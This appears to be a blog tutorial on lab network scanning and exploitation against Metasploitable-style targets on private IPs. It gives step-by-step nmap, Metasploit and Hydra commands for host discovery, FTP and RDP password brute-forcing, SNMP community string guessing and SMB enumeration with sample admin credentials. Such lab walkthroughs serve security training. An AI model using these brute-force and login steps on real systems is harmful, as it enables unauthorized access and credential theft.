Network Scanning 101
Discover Host, OS and other Information through Nmap and Metasploit
Host Discovery:
Command [ Nmap]
Best for Host Discovery [ #nmap -A 192.168.0.1/24 ]
OS Discovery:
Best for OS Discovery [ #nmap -O 192.168.0.118 ]
OS Discovery Using Nmap Scripting Engine
#nmap — — script=smb-os-discovery.nse 192.168.0.118
Scan beyond IDS, Firewall using various Techniques:
Best Command to scan
#nmap -sC -sV -p- -O -A -T4 192.168.0.1/24
Scan Target netwok using Metasploit
Let say, our Target Machine is Metasploitable 2 and We’ll scan the Target Machine’s Network through Metasploit Framework.
So here is the Steps —
Step 01 — Start the Metasploitable 2 Machine
Step 02 — Start Postgresql Service / Initialize msfdb
Step 03 — Run Metasploit Framework
Step 03 — Check the Database Status
Step 04 — Run the Nmap Command
#nmap -Pn -sS -A -oX Test 192.168.0.105/24
Step 05 — Import the Test to the Database
Step 06 — Checkout the Hosts
Step 07 — Checkout the running Services
Step 08 — Search Port Scan
Step 09 — Set the Target
Step 10 — Run
Login and Connect to target ftp Service
Run the Commands step by step
#nmap -p 21 192.168.0.104
as we don’t have any credentials to login in ftp server then have to bruteforce it.
#hydra -L [userlist] -P [passwordlist] 192.168.0.104 ftp
copy the credentials what we get, then save in a file. and after that try to login. Run the command
#ftp 192.168.0.104
> ls
to download the target file use get command
>get secret.txt
>exit
comeback to local machine and run these commands
#ls
#cat secret.txt
And here is the answer.
Find the default ports used by snmp. List valid community strings of the server by using snmp_login Metasploit module
Run these commands step by step.
And here is the resources form nse — https://nmap.org/nsedoc/scripts/
#snmp-check 192.168.0.108
to exploit try this way
#msfconsole
>search snmp
>use auxiliary/scanner/snmp/snmp_login
>show options
>ip a
>set RHOSTS 192.168.0.104
>show options
>exploit
SMB enumeration !!
what to hack ?
-Network File Shares
-Logged in User details
-Workgroups
-Security Level Information
-Domains and Services
Run these commands
#nmap 10.4.29.134
we know SMB service is running in the port 445
Now, Enumerating -Network File Shares
#nmap -p 445 — — script smb-enum-shares 10.4.29.134
Now, Enumerating -Logged in User details
#nmap -p 445 — — script smb-enum-users — — script-args smbusername=administrator, smbpassword=smbserver_771 10.4.29.134
Now, Enumerating -Workgroups
#nmap -p 445 — — script smb-enum-groups — — script-args smbusername=administrator, smbpassword=smbserver_771 10.4.29.134
Now, Enumerating -Security Level Information
#nmap -sC -sV -A -T4 -p445 10.4.29.134
Now, Enumerating -Domains and Services
#nmap -p 445 — — script smb-enum-services — — script-args smbusername=administrator, smbpassword=smbserver_771 10.4.29.134
Exploiting RDP Services !!
we know RDP port is 3389 or 3333
Steps —
- Check for running services on the target and confirm if RDP is running on any open port
- Use Metasploit to confirm the services running is RDP
- Use Hydra to bruteforce the login credentials
- Use the RDP tools to log into the victim’s machine.
Now Let’s start and run the command —
Step 01 —
#nmap 10.5.17.119
Step 02 —
#msfconsole -q
>search rdp
>use auxiliary/scanner/rdp/rdp_scanner [ 35 option]
>show options
> set RHOSTS 10.5.17.119
>set RPORT 3333 or 3389 [ which you’ve found]
>exploit
>exit
Step 03 — Bruteforce login Credentials
#hydra -L [userlist] -P [passwordlist] rdp://10.5.17.119 -s 3333
Step 04 — Use the RDP tools to log into the victim’s machine.
copy the credentials what we get, then save in a file. and after that try to login. Run the command
#xfreerdp /u: [username] /p: [password] /v:[target user’s ip]:3333 [port]
>Y
That’s all !
NetBIOS Enumeration !!
we know NetBIOS ports are 137/TCP or 137/UDP 138/UDP or 139/TCP
So run the command
#nmap -sV — — script nbstat.nse 192.168.0.105
Here you’ll get the answer.
0 Comments